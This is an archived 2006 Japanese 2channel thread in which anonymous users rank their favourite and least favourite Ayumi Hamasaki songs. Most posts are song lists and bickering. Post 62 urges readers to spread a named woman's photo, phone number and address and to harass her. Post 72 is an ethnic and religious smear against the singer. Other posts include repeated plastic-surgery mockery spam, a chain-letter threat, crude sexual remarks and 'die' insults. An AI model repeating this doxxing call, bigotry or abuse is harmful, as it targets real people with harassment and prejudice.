2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

新・2ちゃんねらーが選ぶ、あゆの良曲駄曲BEST5

1 :どっちの名無しさん?:2006/07/07(金) 20:33:17
良曲に関してはアルバム曲だろうがなんだろうが、良い物は良いので、
シングル以外もアリです。
駄曲に関しては、アルバム全体の中で一曲やそこら駄曲があるのは当たり前というのがまずひとつあります。
一方シングルのくせに駄曲というのは許されることではなく、断固糾弾するべきなので、駄曲に関してはシングル曲のみにします。
良曲はアルバム含め全あゆの曲の中から
駄曲はシングルの中から
皆さん切磋琢磨しつつ挙げ連ねてください。

2 :どっちの名無しさん?:2006/07/07(金) 20:35:14
For My Dear
盗作だけどw

3 :どっちの名無しさん?:2006/07/07(金) 20:49:17
良1.Greatful days
2.ourselves
3.is this LOVE?
4.SURREAL
5.RAINBOW
駄1.WHO

4 :BoY ◆Uw.MVB6Cq6 :2006/07/07(金) 21:18:52
駄にWho...がッッ!!!?(゚ロ゚ノ)ノ
オレは…

【G】
A Song for xx
Who...
Because of You
Fly high
fairyland
BLUE BIRD
etc...

【B】
CAROLS
independent+

やっぱいい曲多すぎる播(*・`ω・)
independent+アルバムの最後で長過ぎ…
タるぃ…(ノд`)
あゆの夏曲のバラード聴きたいなぁ…('ー`)
ぜひ夏にアルバムをッ!(`・ω・´)

5 :どっちの名無しさん?:2006/07/07(金) 21:28:37
駄曲No.1は、FORGIVENESSに決定だろ。前スレでも挙げる人多かったし。
歌詞は、そこまで悪くないんだけどな。メロディーが苦手だ。

駄曲二番手は、UNITE!かCOLERSか。

6 :どっちの名無しさん?:2006/07/07(金) 21:34:09
forgivenessやCAROLS、UNITE!はボルデリに比べると
全然まし。ボルデリはあゆの歌手生命で汚点。うんこ以下。
その他にもアルバム曲には糞が多い。Connectedとか数回しか聴いてないwwwwwwwwwwwwwww

7 :どっちの名無しさん?:2006/07/07(金) 21:56:37
前スレ貼れよ

8 :どっちの名無しさん?:2006/07/07(金) 22:18:38
彼女に詩的なものを送りたいのですが、北朝鮮が気になって何も考えられません。浜崎の詩の中でみなさんがいいと思う詩あったら教えて下さい。

9 :どっちの名無しさん?:2006/07/07(金) 22:33:44
アルバムの曲あまり知らないからシングルだけで・・

良曲
1位 SURREAL
2位 Moments
3位 No way to say
4位 STEP you
5位 ourselves

駄曲
1位 Voyage
2位 AUDIENCE
3位 Dearest
4位 TO BE
5位 Startin'

10 :どっちの名無しさん?:2006/07/07(金) 22:34:23
トランスを聞かない人や嫌いな人はConnectedは聞かないかもね。


11 :どっちの名無しさん?:2006/07/08(土) 01:11:22
>>6
sweetboxが歌ってるのは、結構いいんだが。
メロディーが、いいから、まだ聞ける。

確かに歌詞は
「正直さむい」


12 :どっちの名無しさん?:2006/07/08(土) 17:54:08
《前スレ》
2ちゃんねらーが選ぶ、あゆの良曲駄曲BEST5
http://tv8.2ch.net/test/read.cgi/ami/1123602710/

13 :どっちの名無しさん?:2006/07/08(土) 21:56:28
>>6
ボルデリの良さがわからないなんてかわいそうに

14 :どっちの名無しさん?:2006/07/08(土) 22:36:39
■■ 定期浜崎あゆみ(ハマ)整形疑惑画像 ■■
ttp://jbbs.livedoor.jp/bbs/read.cgi/music/10407/1095836641/2
ttp://www.zakzak.co.jp/geino/n-2002_03/image/g2002031401ayu_b.jpg
http://up.vipch.net/src/up0168.xxx http://up.vipch.net/src/up0169.xxx
http://up.vipch.net/src/up0008.xxx 2004紅白 http://up.vipch.net/src/up0009.xxx
あの和田アッ子が腰抜かして驚いたシングル初登場200位圏外のハマジャケ
http://up.vipch.net/src/up0007.xxx   http://up.vipch.net/src/up0043.xxx 
http://up.vipch.net/src/up0010.xxx   http://up.vipch.net/src/up0018.xxx
http://up.vipch.net/src/up0019.xxx   http://up.vipch.net/src/up0006.xxx
うっほー ハマの顔面醜いし汚いよ〜強烈にwwwwwwwwwwww!!
http://www.watch.impress.co.jp/av/docs/20051018/pana1_18.jpg
http://www.watch.impress.co.jp/av/docs/20051018/pana1_17.jpg
http://www.watch.impress.co.jp/av/docs/20051018/pana1_16.jpg
★★★★⇒最新ハマ妖怪画像http://up.vipch.net/src/up0056.xxx

15 :どっちの名無しさん?:2006/07/08(土) 23:18:09
>>9 Voyage Dearest TO BEって名曲だと思うけどな。むしろSTEP YOU
やOurselvesの方が駄曲じゃない?

16 :どっちの名無しさん?:2006/07/08(土) 23:53:24
■アッコにおまかせ!H16 8月8日
松浦と浜崎の関係についての話題.。
浜崎の松浦と関わる前(売れる前)のCDのジャケットが出た。
しかもオリコン初登場で200位圏外のタブーシングル

それを見たアッコは
 「 ええっ全然今の顔と違う。 これって浜崎じゃないだろ。
  顔も不細工で全然可愛くない。光浦のほうがかわいい」

こんな事を繰り返し言い、その後カメラマンに
そのジャケットをさらにアップするように要求した。
峰竜太が「これ以上アップはできません」と興奮するアッコをなだめていた。
勝俣は何度も「あゆですよー。変わってないじゃないですか!」と笑顔でフォロー。

そのCDで初登場200位圏外ジャケット http://up.vipch.net/src/up0007.xxx


17 :どっちの名無しさん?:2006/07/09(日) 00:50:10
アワセルは糞すぎ
PVもキモい

18 :どっちの名無しさん?:2006/07/09(日) 00:58:19
名曲
1・SEASONS
2・DEAREST
3・VOYAGE
4・TOO LATE
5・REAL ME

駄曲
1・FORGIVENESS
2・UNITE!
3・HANABI〜EPISODE‖〜4・STEP you
5・OURSELVES

最近の歌では、HEAVENやGAMEが良曲。

UNITE!で外してDEARESTで復活したが、その後、糞曲を連発して、また落ちたな

19 :どっちの名無しさん?:2006/07/09(日) 01:03:07
forgivenessが不評なのが意味わからん…
たんにドラマがこけたせいで売上が悪くなっただけでしょ?曲の質はかなりいいんだけど。
PVの羽が生えたあゆも可愛いし、セットも豪華。ジャケットも凝ってるし、最高なんだが。

20 :どっちの名無しさん?:2006/07/09(日) 08:56:22
売り上げとか関係ない。FORGIVENESSはぐだくだしすぎで、飽きる。PVの質がいいのは単に金を掛けているから。よく考えると、ayuの曲のPVでヒドイのってあんまり無いし。

それより、新曲の一つ、BEAUTIFUL FIGHERSって糞。なんかアニメっぽい。チープな感じがする。



21 :どっちの名無しさん?:2006/07/09(日) 11:48:25
>>18 evolution出したのにUNITE!みたいな同じ系統の歌は二つもいらな
っかたような気がする。

>>19あれ曲は糞だよ。PVの質が高いのはお金掛けまくったから。

>>20Beautiful〜って菊池一仁作曲だよね?全盛期の作曲家陣起用してあの出来
は。。。

22 :どっちの名無しさん?:2006/07/09(日) 14:36:21
MY STORYの曲はINSPIRE以外はほとんど捨て曲がない

23 :どっちの名無しさん?:2006/07/09(日) 15:43:32
>>22
そう?捨て曲は無いけど、名曲も無いじゃん。
まあ、(miss)UNDERSTOODは糞ばかりだったから、それよりは、マシかもね。


24 :どっちの名無しさん?:2006/07/09(日) 15:56:07
ミスアンはあゆの中でも糞だな。やっぱ初期の3枚が神すぎるからな。A BE
STで宇多田と競わされたあゆは犠牲者。あれから完全にエイベの商品と化して
しまった。


25 :どっちの名無しさん?:2006/07/09(日) 18:27:13
良曲
1 SEASONS
2 A Song for xx
3 STEP you
4 Boys&Girls
5 I am...

駄曲
1 ボールドアンドデリシャス
2 Startin'
3 fairyland
4 INSPIRE
5 UNITE!

26 :どっちの名無しさん?:2006/07/09(日) 21:01:55
■■ 定期浜崎あゆみ(ハマ)整形疑惑画像 ■■
ttp://jbbs.livedoor.jp/bbs/read.cgi/music/10407/1095836641/2
ttp://www.zakzak.co.jp/geino/n-2002_03/image/g2002031401ayu_b.jpg
http://up.vipch.net/src/up0168.xxx http://up.vipch.net/src/up0169.xxx
http://up.vipch.net/src/up0008.xxx 2004紅白 http://up.vipch.net/src/up0009.xxx
あの和田アッ子が腰抜かして驚いたシングル初登場200位圏外のハマジャケ
http://up.vipch.net/src/up0007.xxx   http://up.vipch.net/src/up0043.xxx 
http://up.vipch.net/src/up0010.xxx   http://up.vipch.net/src/up0018.xxx
http://up.vipch.net/src/up0019.xxx   http://up.vipch.net/src/up0006.xxx
うっほー ハマの顔面醜いし汚いよ〜強烈にwwwwwwwwwwww!!
http://www.watch.impress.co.jp/av/docs/20051018/pana1_18.jpg
http://www.watch.impress.co.jp/av/docs/20051018/pana1_17.jpg
http://www.watch.impress.co.jp/av/docs/20051018/pana1_16.jpg
★★★★⇒最新ハマ妖怪画像http://up.vipch.net/src/up0056.xxx

27 :どっちの名無しさん?:2006/07/11(火) 09:54:42
前奏が長いのでウザい

28 :どっちの名無しさん?:2006/07/11(火) 22:08:35
>>27
何の曲が?

29 :どっちの名無しさん?:2006/07/11(火) 22:40:55
神曲 1.SURREAL
2.monochome
3.TO BE
4.too late
5.powder snow
6.And Then
7.Moments
8.Daybreak
9.STEP you
10.INSPIRE



30 :どっちの名無しさん?:2006/07/11(火) 22:44:25
STEP youってそんなに良曲かなぁ?
このスレで挙げる人、多いけど。歌詞が、単純すぎない?

31 :どっちの名無しさん?:2006/07/11(火) 23:22:40
STEP youはプロモのあゆがかわいすぎる!
まあたしかに歌詞は単純かもしれないけどね。

32 :どっちの名無しさん?:2006/07/12(水) 01:54:05
>>31
言えてる。歌詞がださい。

それより、駄曲に妖精国をあげてるのが意味わからない。あんな神曲なのに。
昨年の夏の思い出を呼び起こすちょっぴり哀愁漂う夏曲。何か僕たち
が忘れたものを思い出させてくれるような見事な歌詞に終始関心。あゆ
ちゃんの感性豊かな表現が胸にくるよ、あゆちゃん。静寂から始まるメロディ。
それはなんか夏の夕暮れを彷彿させる。おい帰ろうぜ。いや、まだ
いようよ。そうだな。俺達が集まれる夏は今年しかないかもしれないし。
そんな切ないこというなよ。ここは永遠だぜ。そうだな。俺達は永遠だ。
ほら、夕暮れ迫ってるけど、僕たちは海に現れる朝日みたいに何度も
輝いて現れてくる。僕たちに終わりはないんだよ。あぁ。無邪気な
自分を忘れずに生きていくんだ…

あゆちゃんの歌詞最高

33 :浜崎あゆみ(性病):2006/07/12(水) 08:40:47
歌詞がどうとか言ってるのはオタクのみ。
歌詞なんかどうでもいいの、抜ければいいの。
そういう意味ではHONEYが一番抜けるので神曲。

34 :どっちの名無しさん?:2006/07/12(水) 08:47:46
良曲
1 STEP you
2 LOVE-destiny-
3 BLUE BIRD
4 HEAVEN
5 Dearest

駄曲
1 Free&Easy
2 B&D
3 GAME
4 CAROLS
5 ??

35 :どっちの名無しさん?:2006/07/12(水) 10:09:10
良                       駄
Dearest                A Song for XX(アルバム)
A Song for XX Moments
P.SU HEAVEN
ANGEL'S SONG            Beautiful Fighters
immature             Startin'  
theme of a-nation '03   STEP you
Greatful days
walking proud
Free & Easy
HANABI
July 1st
evolution
Heartplace
Born To Be...
Bold & Delicious

36 :高Bメンズ☆:2006/07/12(水) 11:59:30
今★ぁゆの好きな歌★
INSPIRE
HANABI
Bold&Delicious
LOVE
BLUE BIRD

ぁんまな歌ゎ
A SONG FORのァルバムの全部が声がか細くて嫌↓↓
Dutyからがぃぃ

37 :どっちの名無しさん?:2006/07/12(水) 12:24:57
良曲
1 For my dear...
2 LOVE -destiny-
3 TO BE
4 HANABI
5 M

駄曲
1 B&D
2 Daybreak
3 UNITE!
4 WHATEVER
5 INSPIRE

For my dear... LOVE TO BEは神。声も綺麗だし、歌詞も直に伝わってくる。
他には、Trustなんかも。
HANABIは後の曲にしては、歌詞が直に伝わってくる気がした。
Mはショートカットのプロモだね。

嫌いな曲は、なんか自分だけ楽しんでて聴く人の立場を考えてないような作品。
B&Dなんかまさにその典型だと思います。
プロモだけみたら、BLUE BIRDもその類。

38 :どっちの名無しさん?:2006/07/12(水) 12:55:08
BLUE BIRDは曲は好きだけど、セレブの休日っぽいPVがなんか好きじゃない。


39 :どっちの名無しさん?:2006/07/12(水) 12:57:18
>>36死ね。小文字使うな。死ね

40 :どっちの名無しさん?:2006/07/12(水) 16:06:45

is this LOVE?
monochrome
TO BE
HANABI
POWDER SNOW


Bold&Delicious
forgiveness
UNITE!


41 :どっちの名無しさん?:2006/07/12(水) 21:53:55

And Then
P.S 2
HEAVEN
monochrome
Replace

UNITE!
evolution
Bold & Delicious
independent
WHATEVER VersionJじゃないほう

42 :どっちの名無しさん?:2006/07/12(水) 22:28:57
UNITE!駄曲に上げてる人多いね。あたしもあれ前は結構嫌いだった
けど、最近聞いてみたらはまった。

43 :どっちの名無しさん?:2006/07/12(水) 22:32:04
良 2ndアルバムまで
駄 それ以降

44 :どっちの名無しさん?:2006/07/12(水) 22:51:29
シングルで
良曲
1 SEASONS
2 SURREAL
3 TO BE
4 pocer face
5 Boys&Girls
駄曲
1 ボルデリ
2 forgiveness
3 UNITE!
4 Moments
5 July1st


45 :どっちの名無しさん?:2006/07/12(水) 23:46:37

A song for XX
SURREAL
YOU

Bold&dericious(なんか歌ってる部分少なくない?)
forgiveness(サビの直前が嫌)

BLUE BIRDは確かにいいけど、PV微妙。Beautiful Fightersはわりとよかった。

46 :どっちの名無しさん?:2006/07/13(木) 01:56:11
よくみたら、最近の曲>過去曲というやつが多いな。

つまり魅力が増したということか!!

47 :どっちの名無しさん?:2006/07/13(木) 01:59:06
三大神曲

A song for XX
SURREAL
RAINBOW

三大糞曲

ボルデリ
うないと
INSPIRE



48 :どっちの名無しさん?:2006/07/13(木) 02:32:02
あゆのダーク?っぽい曲が好き☆
1.ourselves
2.INSPIRE
3.alterna



49 :どっちの名無しさん?:2006/07/13(木) 02:52:51
しかしなんでこんなにもSEETBOXの曲パクってんのになんにも言わないんだろう、あゆは。
パクりは言い過ぎかもしれないけど「カバーしました」とか報告?あってもいいんじゃないか?

なんにも言わないよね。知らぬが神って事?

スレチな事書いてスマソ。。
でも(miss)〜のアルバムのほとんどがSEETBOXの曲ってなんなんだよって思ってさ‥。


50 :どっちの名無しさん?:2006/07/13(木) 06:55:55
SWEET BOXじゃね?

51 :どっちの名無しさん?:2006/07/13(木) 07:56:10
>>49
パクったんじゃなくね?
sweetboxが、曲提供したんじゃなかったっけ。
でも、あゆが歌うより、sweetboxが歌う方がしっくりくる。


52 :どっちの名無しさん?:2006/07/13(木) 09:13:30
>>42
何故浜ったのか簡単に述べよ(ハマヲタ大学入試)
※正解率80%

53 :どっちの名無しさん?:2006/07/13(木) 11:08:56
>>46こんな整形お化けにもともと魅力なんかねーよボケカスが

54 :どっちの名無しさん?:2006/07/14(金) 00:26:26
アッコにおまかせ!H16 8月8日

松浦と浜崎の関係についての話題.。
浜崎の松浦と関わる前(売れる前)のCDのジャケットが出た。
しかもオリコン初登場で200位圏外のタブーシングル

それを見たアッコは
 「 ええっ全然今の顔と違う。 これって浜崎じゃないだろ。
  顔も不細工で全然可愛くない。光浦のほうがかわいい」

こんな事を繰り返し言い、その後カメラマンに
そのジャケットをさらにアップするように要求した。
峰竜太が「これ以上アップはできません」と興奮するアッコをなだめていた。
勝俣は何度も「あゆですよー。変わってないじゃないですか!」と笑顔でフォロー。

そのCDで初登場200位圏外ジャケット
http://up.vipch.net/src/up0007.xxx


55 :浜崎あゆみ(性病):2006/07/14(金) 11:36:24
今日もHONEY聴きながらオナニーしたお

56 :どっちの名無しさん?:2006/07/14(金) 11:58:47
>>49
恥ずかしいやつwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

57 :うに:2006/07/14(金) 21:54:54
良曲
Endroll
Who
メモアド
Key
monoclome

駄曲
最近のは…ほぼ。
低いからあゅらしくないような気がする。やっぱ、ベストあたりのキレイな高音をまた聞きたい☆
でも、好きだけど☆
良曲・駄曲って、やっぱり好みじゃない?

58 :うに:2006/07/14(金) 22:02:31
良曲
Endroll
Who
メモアド
monoclome
ラヴデ
Key
駄曲
基本的には無し
でも、最近のは…ほぼ。
低い曲ってあゅらしくないような気がする。やっぱキレイな高音をまた聞きたい☆


59 :どっちの名無しさん?:2006/07/14(金) 22:03:51
>>57-58
二回も書くってwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

60 :どっちの名無しさん?:2006/07/14(金) 22:16:18
`i.   ,'    ヽ、,,__    `i      ̄\ _       }_,,,,,,i ノ
      ヽ-、. ,'       ヽ,,__ :}`ヽ.      _,>―-=''"ノ-‐`'二=、
         Y          ', :i   ` ‐、 r=二-‐、、-;;=ー'´   , ‐',,-'" {i;;;;;、
         ヽ、   /     R'   ,、‐'"_,,,、、r-‐'"~   _,∠,,;;;;;,=-、{,{,_ `''‐;,、、./⌒'、__
           `('",' ,'      :|、`‐i'/´ ,/ / ,、---=;、‐'"    `ミ;;、  ヾ~~`''>' ./、; `'r‐、
            `i       | `''y' /  ,、-‐'":::::::::::::::::::::.     ヾ)     (__.ノ  {  ,' .,':、
            |         .| .r',〆'"´         ''''''、:::::...     ‖   }:....    ヽ__) 、{、 ヽ、_
            |       ;;i、‐"            ` ‐ ゝ.     ‖   ノ"       `'''´ `、_) `'‐ 、
            |:::::::::::::::, -"                   ヽ   !. /                 `'‐ 、
            !::::::::; '                       \,',' ','/.                     `': 、
            |;/          .               ,'ヾ;;;ノ; ;                       `:
            /                           ,',' Y υ                         `: 、
         /.               ι           ι  }
        /                              .    }::.       ι
      , '                                  ノ::::::
     , '                          υ      ,、‐' ヽ 、::::::::..... 、_

61 :タクミ ◆bKof1KClBM :2006/07/14(金) 22:26:22
@evolution
ACONNECTED
BHONEY
この3曲は俄然オススメ!

62 ::2006/07/14(金) 23:23:24
サッカーの中田英と結婚間近と週刊誌に書かれていたあの、浜崎あゆみのゴーストライター(あゆの変わりにすべての曲を作詞してる人)を7年前からやっている「やました ゆう」22才の写メ入手!携帯番号や住所なども書かれています。
みんなに広めて嫌がらせしまくろう!
3年間付き合った歌手のガクトをふって9ヵ月前から中田と付き合いだしたと週刊誌に書かれていた。
↓つないだら写メの下の方を見ていくと「やました ゆう」の今日の行動情報などが入ってます。

http://pics.m.livedoor.com/u/chii22/909255?sss=5f5dc771a89a8fa6



63 :どっちの名無しさん?:2006/07/16(日) 01:36:09
俺的にアルバムはDutyが一番

64 :どっちの名無しさん?:2006/07/17(月) 11:41:35
>>63同意。
あのアルバムを超えるアルバムはもうでないと思う

65 :どっちの名無しさん?:2006/07/17(月) 15:06:45
良曲
@Born To Be...
AVoyage
BBLUE BIRD
CAbout You
DHEAVEN

駄曲
@still alone
Afrom your letter
BHANABIU
CRAINBOW
Dcriminal

66 :どっちの名無しさん?:2006/07/17(月) 15:11:19
>>65
禿禿同!

67 :どっちの名無しさん?:2006/07/17(月) 20:32:54

TO BE
YOU
A Song for ××
Who..
As if

良+
三部作 + ever free
SURREAL
WHATEVER
End roll
Hana
key


〜RAINBOWくらいまで


それ以外(Memorial addressを除く)


VIPにも98〜99年くらいからのファンが
意外と多く存在することに驚き

68 :どっちの名無しさん?:2006/07/17(月) 21:19:39
良い
@エンドロール
Aモノクローム
Bインマチュア
Cヴオーグ
Dアピア


@&
Aインスパイア
B美しい戦士達
C美しい日々
Dクロストゥユー

69 :うに ◆7RHZ3iPdF. :2006/07/17(月) 23:17:59
>>57-58です。
すみません…エラーになったから書き直したら、ちゃんといってました☆
気をつけるです!

70 :どっちの名無しさん?:2006/07/18(火) 08:54:51
良曲
monochrome
Because of You
is this LOVE?
my name's WOMEN
alterna

駄曲
forgiveness
Two of us
RAINBOW
no more words
Beautiful Fighters

71 :どっちの名無しさん?:2006/07/18(火) 11:44:35

ブルバ
アンスチュ
プライド
プラウド
天使
ビコーズ
ギビネス
ハトプレ
7月1日
A Song for(A BEST


ステップ
ヘブン
キャルロス
コネクテッド
1stアルバム

72 :どっちの名無しさん?:2006/07/18(火) 19:52:04
朝鮮人の婆崎プロフィール

本名(日本名) : 濱崎歩

芸名暦 : 濱崎歩 → 浜あゆみ → 浜崎くるみ → 浜崎あゆみ → ハマ(現在)

母親が朝鮮人の在日2世
母親と共々創価学会員

生まれ(自称) : 長崎県
芸暦 : 子役時代から含めて18年
好きなタレント : 中森明菜 マドンナ KEIKO ノッコ cocco
趣味(得意技)  物マネ パクリ ホラ話 盗作  嫌味  金集め

73 :どっちの名無しさん?:2006/07/28(金) 12:50:16
あげ

74 :どっちの名無しさん?:2006/07/28(金) 22:50:39
>>71
凄い書き方だね〜アンスチュが分からん!悔しいぃ

ちなみに私はconnected大好き

75 :どっちの名無しさん?:2006/07/30(日) 19:01:51
え〜なんで誰もteddy bearについてふれてないの〜?

76 :どっちの名無しさん?:2006/07/30(日) 19:04:38
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。俺も頑張らなきゃなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。探してもいない。泣きたくなった。                   


このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。 
信じるか信じないかはあなた次第です。


77 :どっちの名無しさん?:2006/07/30(日) 19:26:05
最近だとMomentsが一番良い。初期のあゆみたいで

78 :ゅぃゅぃ:2006/07/30(日) 19:28:27
ネ申
appears
As if...
from your letter
teddy bear
LOVE~destiny~
Real me
In The Corner等


criminal
Pride
Will等

歌詞は全部良いけどめろでぃーが…

その他良

79 :どっちの名無しさん?:2006/07/30(日) 22:52:52
良曲
monochrome
LOVE -Destiny-
HEAVEN
Replace
Presents
駄曲
Two of us
Beautiful Fight
ourselveat
appears
Moments

最近A Song for XXとWho..が本当に神曲なのか疑問に思える……

80 :どっちの名無しさん?:2006/07/31(月) 19:28:09
HONEYとか、キュ〜ってくるwillはなぁ・・・一歩まちがえたかなぁって感じ

81 :どっちの名無しさん?:2006/07/31(月) 21:25:33
>>79
ourselveatって何!?

82 :どっちの名無しさん?:2006/07/31(月) 21:46:15
良曲
1.Depend on you
2.Startin'
3.Naturally
4.Fly high
5.SURREAL

駄曲
1.Bold & Delicious
2.NEVER EVER
3.forgiveness
4.無し
5.無し

83 :どっちの名無しさん?:2006/08/04(金) 23:15:23

1.Dearest
2.Seasons
3.You
4.Voyage
5.Who...

84 :どっちの名無しさん?:2006/08/04(金) 23:53:48
良曲
@Endless sorrow
Ateddy bear
Boueselves
CMemorial address
DBorn To Be...
駄曲
@HANABIU
AHimming 7/4
BBeautiful Day
CUNITE!
DI am...

85 :どっちの名無しさん?:2006/08/05(土) 17:36:09
>>65
良と駄がまるごと俺と正反対だな・・・

86 :どっちの名無しさん?:2006/08/05(土) 18:01:50
>>79A Song ForとWho・・・は名曲だと思うよ今聞いても
ね。

あゆは神曲っていうか良曲が多い印象。SEASONSも名曲って感じ
だし

87 :りんご:2006/08/05(土) 18:59:09
良曲
@AUDIENCE @Who... @A song for xx
AFly high“SINGLE&ALBUMどっちも” ASURREAL AHeartplace
BJuly 1st BBLUE BIRD BWE WISH
CSEASONS CRAINBOW
DEndless sorrow DDay break“SINGLE&ALBUMどっちも”

駄曲SINGLE      全部
@Bold & Delicious  @Bold & Delicious
APride        Acriminal 
BCAROLS       BPride
Cなし        Cfrom your letter
Dなし        DHONEY

88 :どっちの名無しさん?:2006/08/07(月) 18:23:16

1.Startin'
2.Fly high
3.AUDIENCE
4.A Song is born
5.Depend on you


Bold & Deliciousのみ

89 :どっちの名無しさん?:2006/08/10(木) 18:21:44
良:1Fly high
  2Boys&Girls
  3Memorial address
  4Greatful days
  5NEVER EVER

駄:1Bold & Delicious
  2UNITE!
  3ourselveat
  4forgiveness
  5fairyland



90 :どっちの名無しさん?:2006/08/10(木) 18:28:53
ourselveatじゃなくて
ourselvesね

91 :どっちの名無しさん?:2006/08/10(木) 18:46:28

1ourselves
2Fly high
3Real me
4TO BE
5evolution


1M
2Day break
3LOVE〜Destiny〜
以上。

92 :どっちの名無しさん?:2006/08/10(木) 19:38:48

1.Depend on you
2.A Song is born
3.Dearest
4.SURREAL
5.Fly high


1.Bold & Delicious
2.forgiveness
3.No way to say
4.CAROLS
5.Pride


中森明菜の愛撫を越える神曲を聞いてみたい…

93 :どっちの名無しさん?:2006/08/11(金) 03:36:43

monochrome
SURREAL
And Then
immature
Daybreak(アルバムver
Wishing


Bold&Delicious
Born To Be...
Hana(メロディが駄
UNITE!
HONEY

94 :どっちの名無しさん?:2006/08/11(金) 14:07:11
良曲
memorial address
Bold&delicious
STEP you
FRIEND
wishing
HANABI(2曲)
駄曲
UNITE!
YOU


95 :どっちの名無しさん?:2006/09/14(木) 13:06:07
vogue 並〜Far away 駄〜SEASONS 神

この三曲はマジでバランス悪すぎワロス

96 :どっちの名無しさん?:2006/09/14(木) 14:07:08
良曲
A Song for XX
Who...
voyage
Moments
evolution

駄曲
UNITE
Far away
free&easy
forgiveness


97 :どっちの名無しさん?:2006/09/14(木) 14:56:08
良曲
@Moments
AHAPPY ENDING
BStartin'
CHEAVEN
DMemorial Adress

駄曲
@ボルデリ

sweet boxが歌うボルデリは好きだけどあゆのは微妙…
てかsweet boxが曲提供したって知らない馬鹿がココにカキコミしてんのが驚き。「なんでみんな何も言わないの」って、みんなお前と違って曲提供したって知ってるからだよ…

98 :どっちの名無しさん?:2006/09/15(金) 01:25:22

@monochrome
Aend roll
BSURREAL
CHEAVEN
DDearest

99 :どっちの名無しさん?:2006/09/15(金) 06:38:10
walking proud
Replace
About you
my name's WOMEN
HAPPY ENDING
好き



100 :どっちの名無しさん?:2006/09/15(金) 09:41:33

あなた全部マイストじゃん!
HAPPY ENDINGはまぢでネ申!!

101 :どっちの名無しさん?:2006/09/15(金) 11:17:46

良い曲多すぎて、
選びキレないよう!

102 :どっちの名無しさん?:2006/09/15(金) 13:53:36
ライブでしかやらない曲名なんだっけ?
それがいい。

103 :どっちの名無しさん?:2006/09/15(金) 21:13:30
同じ様な曲が多くて飽きる。

104 :どっちの名無しさん?:2006/09/15(金) 21:15:05
そうかな?

105 :どっちの名無しさん?:2006/09/15(金) 21:19:37
夏に出す歌は似たようなの多いな

106 :どっちの名無しさん?:2006/09/15(金) 23:56:31
>>94
YOUが駄曲ってバカですか?
1回氏んでください^^;

さらしあげ

107 :どっちの名無しさん?:2006/09/16(土) 00:08:23
似たような過去スレ発見
http://tv.2ch.net/ami/kako/1024/10240/1024072422.html

108 :どっちの名無しさん?:2006/09/16(土) 02:26:37

SESONS
Fly high
HEAVEN
ever free

Far away
forgiveness
Pride

109 :どっちの名無しさん?:2006/09/16(土) 03:17:39
倖田來未×ファーギーが女性誌で2ショット実現「次はステージで」

 歌手、倖田來未(23)と米人気ヒップホップグループ「ブラック・アイド・ピーズ」の
ファーギー(31)との2ショットが、10月7日発売の女性ファッション誌
「SCawaii!」11月号(主婦の友社)で実現した=写真。

 ファーギーのファンである倖田が熱望して実現。セクシーなファッションが世界中の注目を集め、
13日にソロアルバム「ザ・ダッチズ」を発売したファーギーは、
“エロかっこいい”倖田を「アーティストとしても女性としても魅力的な人」と絶賛した。

 撮影中は音楽談義で盛り上がったといい、ファーギーは「次はステージでご一緒したい」と
セクシー歌姫の日米共演に意欲をみせていた。

ソース:SANSPO.COM 2006/09/15
http://www.sanspo.com/geino/top/gt200609/gt2006091508.html

110 :どっちの名無しさん?:2006/09/16(土) 04:22:02
theme of a-na よくない???

111 :どっちの名無しさん?:2006/09/16(土) 07:58:14
>>禿同三⊂(^ω^)⊃

112 :どっちの名無しさん?:2006/09/16(土) 07:59:29
>>94もう一回氏んでください(^ω^)

113 :どっちの名無しさん?:2006/09/16(土) 08:46:50

who
ever free
over
you
trust

最近の歌全般

114 :どっちの名無しさん?:2006/09/16(土) 18:42:35
良曲
SEASONS
voyage
SURREAL
A4曲全部
Moments
STEP you
faily land

駄曲
なし

あえていえば
M




115 :どっちの名無しさん?:2006/09/16(土) 18:58:35
神曲

Who...
SEASONS
HEAVEN
BLUE BIRD
Replace
Moments
no more words
Born To Be...
YOU

ゴミ曲(Albumは多すぎるからSingleのみ)

Startin'
ボルデリ
Pride
オルターナ
初期のやつ

Born To Be...嫌いなやついるけど、歌詞はかなり神!!オルターナとか変なROCKはうざい!!
ユナイトはリズムがよくて意外といい。でも、これだけは自信もっていえる…



【ボルデリはゴミ以下だな】

116 :どっちの名無しさん?:2006/09/16(土) 19:47:27
ボルデリバカにすんな(`⊇´)

117 :どっちの名無しさん?:2006/09/16(土) 19:54:00
>>116
きゃはははは(^O^)
ボルデリはまじで糞だからワラ!あんなのどこを誉めればいいんだ??
あれって、あゆを落ち目にするためにエイベックスあゆ抵抗勢力派が無理矢理ださせた曲だろ?
ボルデリなんか一生馬鹿にされるための糞曲でしかないワラ ま、あんな糞曲がでたからHEAVENが神になったわくだから、
引き立て役にはなったなワラ

118 :どっちの名無しさん?:2006/09/16(土) 20:40:58
ボルデリって正直痛々のがいっぱいだった。

・PVで外国のひとつの街を豚小屋トラックでひきずりまわって外人に笑われる。
 CDは全く売れず。

・傷む覚悟で髪を黒くし、クレオパトラ型にしてまで挑む。
 CDは全く売れず。

・PRではハロプロが着るようなアホなドレスを毎回着て歌う。
 CDは全く売れず。

119 :どっちの名無しさん?:2006/09/16(土) 20:44:23
は????CD売れてんじゃん。だから1位とってんじゃん。
あゆが売れてないっていうんなら他の人クソだし。

120 :どっちの名無しさん?:2006/09/16(土) 20:46:18
ボルデリは、あゆにしては史上最低なぐらい売れなかったと言う意味だよ。
別に他アーと比較してないし、そんなにムキにならなくても...。

121 :どっちの名無しさん?:2006/09/16(土) 20:59:29
>>118
そのハロプロ衣装は一着3000万円(^O^)無駄に金をかけたのに曲は売れず(^O^)
年間50位以下w

>>119
